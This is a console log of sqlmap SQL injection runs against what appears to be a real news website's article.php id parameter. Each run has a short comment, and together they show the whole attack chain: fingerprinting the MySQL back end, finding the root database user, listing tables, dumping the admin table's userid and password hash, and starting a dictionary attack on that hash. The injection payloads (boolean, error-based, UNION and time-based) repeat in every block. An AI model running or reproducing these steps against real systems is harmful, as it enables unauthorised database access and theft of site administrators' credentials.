D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* Note: get the current user name
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'
shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of the columns
    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14

D:\Python27\sqlmap>